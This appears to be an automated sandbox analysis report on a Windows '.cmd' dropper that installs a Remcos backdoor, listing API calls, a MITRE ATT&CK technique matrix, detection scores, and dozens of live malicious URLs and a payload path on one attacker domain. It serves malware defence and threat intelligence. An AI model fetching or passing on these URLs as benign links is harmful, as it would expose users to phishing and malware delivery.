Source: C:\Users\Public\alpha.exe

Code function: 4_2_00007FF719688654 GetSystemTime,SystemTimeToFileTime,

4_2_00007FF719688654

Source: C:\Users\Public\kn.exe

Code function: 7_2_00007FF68ACF6CB4 ConvertStringSidToSidW,LookupAccountNameW,GetLastError,#359,LocalAlloc,#357,LocalAlloc,LookupAccountNameW,GetLastError,IsValidSid,LocalFree,LocalFree,

7_2_00007FF68ACF6CB4

Source: C:\Users\Public\alpha.exe

Code function: 4_2_00007FF71966586C GetVersion,

4_2_00007FF71966586C

Source: C:\Users\Public\kn.exe	Code function: 7_2_00007FF68AC5227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,	7_2_00007FF68AC5227C
Source: C:\Users\Public\kn.exe	Code function: 7_2_00007FF68AC6E568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,	7_2_00007FF68AC6E568
Source: C:\Users\Public\kn.exe	Code function: 7_2_00007FF68AC554A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,	7_2_00007FF68AC554A0
Source: C:\Users\Public\kn.exe	Code function: 7_2_00007FF68AC75648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,	7_2_00007FF68AC75648

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	2 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	2 Valid Accounts	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	Data from Removable Media	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	21 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	1 System Network Connections Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	11 Process Injection	1 Install Root Certificate	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	35 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	331 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	211 Masquerading	DCSync	1 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Valid Accounts	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	21 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	11 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
78326473_PDF.cmd	18%	ReversingLabs	Win32.Trojan.Leonem

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\Libraries\Host.COM	100%	Avira	HEUR/AGEN.1326062
C:\Users\Public\Libraries\Host.COM	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Host.COM	68%	ReversingLabs	Win32.Backdoor.Remcos
C:\Users\Public\alpha.exe	0%	ReversingLabs
C:\Users\Public\kn.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiL	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/ya	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/K	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/MIEJOHNSONERE/190_Ovqqzpvffyagm	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyaCompan	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/pQ	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-RangesLas	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/r	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/yak_	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgifya	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/yas_	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/p	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifyapQ	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifyac_	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in:443/MIEJOHNSONERE/190_Ovqqzpvffya	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgifyaa	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifya;	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgifya9m	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/s_	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifya	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/MIEJOHNSONERE/190_Ovqqzpvffya.dll	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-R	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyaU	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyaT	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi77	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/k_	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/yapQ	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifyaK	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/h9	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/c_	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in:443/MIEJOHNSONERE/190_Ovqqzpvffya6l	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyaF	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/yac_	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/MIEJOHNSONERE/1	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/?	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/;	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in:443/MIEJOHNSONERE/190_Ovqqzpvffyaa	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in:443/MIEJOHNSONERE/190_Ovqqzpvffya9m	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/(	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/MIEJOHNSONERE/190_Ovqqzpvffya	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgigi-sys/suspendedpage.cgi	100%	Avira URL Cloud	phishing
https://taksonsdfg.co.in	100%	Avira URL Cloud	phishing
https://www.veeble.org/contact/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
taksonsdfg.co.in	108.170.55.202	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/MIEJOHNSONERE/190_Ovqqzpvffya	true	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP	kn.exe, 00000007.00000000.1308414340.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1322812219.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000000.1325401061.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000002.1332197118.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp	false		high
https://login.microsoftonline.com/%s/oauth2/authorize	kn.exe	false		high
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi	Host.COM, 0000000B.00000003.2311946192.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2269142479.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2357578707.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573365210.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398663811.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2141146175.000000000088F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.000000000089B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2483388858.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1922948607.0000000000865000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2098329111.000000000088F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1966318682.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2141146175.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1787517940.0000000000859000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/ya	Host.COM, 0000000B.00000003.2483388858.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1839691740.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2311946192.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiL	Host.COM, 0000000B.00000003.2483388858.000000000086D000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-RangesLas	Host.COM, 0000000B.00000003.2440234813.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573365210.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2098329111.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1787517940.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1444396121.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2012862554.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573365210.00000000007DF000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2055223478.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1487958254.0000000000857000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyaCompan	Host.COM, 0000000B.00000003.2440234813.000000000086A000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2311946192.000000000086A000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2357578707.000000000086A000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398663811.0000000000865000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/MIEJOHNSONERE/190_Ovqqzpvffyagm	Host.COM, 0000000B.00000003.1922948607.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1839691740.000000000089B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://enterpriseregistration.windows.net/EnrollmentServer/key/	kn.exe	false		high
https://taksonsdfg.co.in/K	Host.COM, 0000000B.00000003.2483388858.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2055223478.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573365210.0000000000881000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/r	Host.COM, 0000000B.00000003.1839691740.0000000000865000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1578286696.0000000000862000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/pQ	Host.COM, 0000000B.00000003.1747394449.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/yak_	Host.COM, 0000000B.00000003.2311946192.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgifya	Host.COM, 0000000B.00000003.2311946192.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2269142479.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2357578707.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573365210.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398663811.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.000000000089B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2483388858.000000000089C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/yas_	Host.COM, 0000000B.00000003.1922948607.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2098329111.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifyac_	Host.COM, 0000000B.00000003.1839691740.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgifyaa	Host.COM, 0000000B.00000002.2573365210.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2483388858.000000000089C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://%ws/%ws_%ws_%ws/service.svc/%ws	kn.exe	false		high
https://enterpriseregistration.windows.net/EnrollmentServer/device/	kn.exe	false		high
https://taksonsdfg.co.in/p	Host.COM, 0000000B.00000003.1487958254.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in:443/MIEJOHNSONERE/190_Ovqqzpvffya	Host.COM, 0000000B.00000003.2311946192.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2269142479.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2357578707.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573365210.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398663811.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.000000000089B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2483388858.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1922948607.0000000000865000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2098329111.000000000088F000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1966318682.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2141146175.000000000089C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifyapQ	Host.COM, 0000000B.00000003.2530460576.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2098329111.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgifya9m	Host.COM, 0000000B.00000002.2573365210.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398663811.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.000000000089B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2483388858.000000000089C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifya;	Host.COM, 0000000B.00000002.2573365210.0000000000881000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://login.microsoftonline.com/%s/oauth2/token	kn.exe	false		high
https://taksonsdfg.co.in/s_	Host.COM, 0000000B.00000003.1444396121.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1705256794.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1487958254.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifya	Host.COM, 0000000B.00000003.2483388858.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1787517940.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2269142479.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2012862554.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1705256794.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1922948607.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1578286696.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2311946192.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-R	Host.COM, 0000000B.00000003.1839691740.000000000085F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi77	Host.COM, 0000000B.00000003.1401491883.000000000085F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/k_	Host.COM, 0000000B.00000003.2357578707.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2012862554.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1966318682.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/yapQ	Host.COM, 0000000B.00000002.2573365210.0000000000881000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2141146175.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/MIEJOHNSONERE/190_Ovqqzpvffya.dll	Host.COM, 0000000B.00000002.2573365210.00000000007DF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyaU	Host.COM, 0000000B.00000002.2573365210.000000000082B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyaT	Host.COM, 0000000B.00000002.2573365210.000000000082B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifyaK	Host.COM, 0000000B.00000003.1444396121.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/h9	Host.COM, 0000000B.00000003.2269142479.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/c_	Host.COM, 0000000B.00000003.1747394449.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in:443/MIEJOHNSONERE/190_Ovqqzpvffya6l	Host.COM, 0000000B.00000002.2573365210.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398663811.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2530460576.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.000000000089B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2483388858.000000000089C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/yac_	Host.COM, 0000000B.00000003.1922948607.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/MIEJOHNSONERE/1	Host.COM, 0000000B.00000002.2587832957.000000001D9EF000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2587832957.000000001DA5D000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2587832957.000000001DA2B000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyaF	Host.COM, 0000000B.00000003.1578213645.00000000008A0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/	Host.COM, 0000000B.00000003.2398663811.0000000000865000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2141146175.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1487958254.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398663811.000000000088F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah	kn.exe, 00000007.00000000.1308414340.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1322812219.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000000.1325401061.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000002.1332197118.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp	false		high
https://taksonsdfg.co.in/?	Host.COM, 0000000B.00000003.1401491883.000000000085F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in:443/MIEJOHNSONERE/190_Ovqqzpvffyaa	Host.COM, 0000000B.00000003.2357578707.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398663811.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.000000000089B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in/;	Host.COM, 0000000B.00000003.2357578707.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2269142479.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1966318682.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc	kn.exe	false		high
https://taksonsdfg.co.in/(	Host.COM, 0000000B.00000003.2483388858.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in:443/MIEJOHNSONERE/190_Ovqqzpvffya9m	Host.COM, 0000000B.00000003.2311946192.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2269142479.000000000089C000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2357578707.000000000089C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.pmail.com	Host.COM, Host.COM, 0000000B.00000003.1337851402.0000000002905000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1338107962.000000007F98F000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2589227345.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2575784009.0000000002ACE000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2575107446.000000000290A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgigi-sys/suspendedpage.cgi	Host.COM, 0000000B.00000002.2573365210.000000000082B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://taksonsdfg.co.in	Host.COM, 0000000B.00000002.2573365210.000000000082B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
